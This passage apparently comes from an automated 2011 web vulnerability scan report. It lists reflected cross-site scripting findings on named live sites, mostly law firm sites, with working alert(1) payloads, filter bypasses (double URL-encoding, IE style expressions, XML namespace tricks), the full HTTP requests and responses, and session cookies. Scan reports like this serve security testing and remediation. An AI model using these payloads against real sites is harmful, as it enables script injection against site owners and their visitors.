HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:48:15 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:48:20 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:48:03 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 528
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
4.94. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'> ...[SNIP]...
4.95. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <350) { location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True' }
The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
...[SNIP]... </h2>
I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br> ...[SNIP]...
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
4.100. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fulbright.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/ Content-Type: text/xml
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l ...[SNIP]... <a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a> ...[SNIP]...
4.104. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.jonesdaydiversity.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title id="ctl00_htmlTitle">Jones Day Diversity</title> <link rel="stylesheet" ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]> ...[SNIP]...
4.105. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.learnestateplanning.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1 Host: www.learnestateplanning.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 19 Jan 2011 16:52:08 GMT Content-type: text/html Connection: close
The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.108. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.local.com
Path: /results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX law offices | Find ...[SNIP]... <select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);"> ...[SNIP]...
4.109. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mckennacuneo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1 Host: www.mckennacuneo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 16:52:37 GMT Server: Apache/2.2.15 (FreeBSD) X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15847
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'> <html xmlns='http://www.w3.org/1999/xhtml'> <head> <meta http-equiv='Content-Type' content='text/html; ...[SNIP]... <a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'> ...[SNIP]...
4.110. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.skadden.com
Path: /2011insights.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
